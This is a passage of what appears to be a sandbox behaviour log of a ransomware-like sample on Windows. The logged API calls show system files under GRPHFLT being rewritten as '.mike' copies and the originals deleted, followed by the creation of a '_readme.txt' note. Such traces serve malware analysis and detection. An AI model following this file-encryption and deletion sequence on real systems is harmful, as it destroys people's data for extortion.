shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.373] GetFileType (hFile=0x264) returned 0x1 [0042.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0042.374] GetFileType (hFile=0x264) returned 0x1 [0042.374] CloseHandle (hObject=0x264) returned 1 [0042.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.374] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.374] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), fInfoLevelId=0x0, lpFileInformation=0x224efbc | out: lpFileInformation=0x224efbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774)) returned 1 [0042.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.374] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), fInfoLevelId=0x0, lpFileInformation=0x224f2a4 | out: lpFileInformation=0x224f2a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774)) returned 1 [0042.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.375] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.375] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.376] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.376] GetFileType (hFile=0x264) returned 0x1 [0042.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.376] GetFileType (hFile=0x264) returned 0x1 [0042.376] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.377] WriteFile (in: hFile=0x264, lpBuffer=0x224ffd0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x224ffd0*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.377] CloseHandle (hObject=0x264) returned 1 [0042.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.378] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), fInfoLevelId=0x0, lpFileInformation=0x224fb24 | out: lpFileInformation=0x224fb24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774)) returned 1 [0042.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.378] GetFileType (hFile=0x264) returned 0x1 [0042.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.379] GetFileType (hFile=0x264) returned 0x1 [0042.379] ReadFile (in: hFile=0x264, lpBuffer=0x22510dc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22510dc*, lpNumberOfBytesRead=0x2af0c8*=0x774, lpOverlapped=0x0) returned 1 [0042.380] CloseHandle (hObject=0x264) returned 1 [0042.381] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.381] GetFileType (hFile=0x264) returned 0x1 [0042.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.381] GetFileType (hFile=0x264) returned 0x1 [0042.381] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.381] WriteFile (in: hFile=0x264, lpBuffer=0x2256c4c*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2256c4c*, lpNumberOfBytesWritten=0x2af0bc*=0x780, lpOverlapped=0x0) returned 1 [0042.381] CloseHandle (hObject=0x264) returned 1 [0042.382] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0042.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.382] GetFileType (hFile=0x264) returned 0x1 [0042.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0042.382] GetFileType (hFile=0x264) returned 0x1 [0042.383] WriteFile (in: hFile=0x264, lpBuffer=0x2259e58*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2259e58*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.383] CloseHandle (hObject=0x264) returned 1 [0042.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.384] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe376b680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe376b680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe376b680, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9a0)) returned 1 [0042.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike", lpFilePart=0x0) returned 0x42 [0042.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.mike"), fInfoLevelId=0x0, lpFileInformation=0x225b518 | out: lpFileInformation=0x225b518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe376b680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe376b680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe376b680, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9a0)) returned 1 [0042.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", dwFileAttributes=0x80) returned 1 [0042.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.385] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 1 [0042.386] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.386] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.386] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.386] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", lpFilePart=0x0) returned 0x42 [0042.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0042.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0042.387] GetFileType (hFile=0x264) returned 0x1 [0042.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0042.387] GetFileType (hFile=0x264) returned 0x1 [0042.387] WriteFile (in: hFile=0x264, lpBuffer=0x225d138*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x225d138*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0042.390] CloseHandle (hObject=0x264) returned 1 [0042.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.391] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.391] GetFileType (hFile=0x264) returned 0x1 [0042.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0042.391] GetFileType (hFile=0x264) returned 0x1 [0042.391] CloseHandle (hObject=0x264) returned 1 [0042.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.391] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.392] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), fInfoLevelId=0x0, lpFileInformation=0x225ff90 | out: lpFileInformation=0x225ff90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb)) returned 1 [0042.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.392] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), fInfoLevelId=0x0, lpFileInformation=0x2260278 | out: lpFileInformation=0x2260278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb)) returned 1 [0042.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike", lpFilePart=0x0) returned 0x42 [0042.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.392] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpFilePart=0x0) returned 0x3d [0042.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", 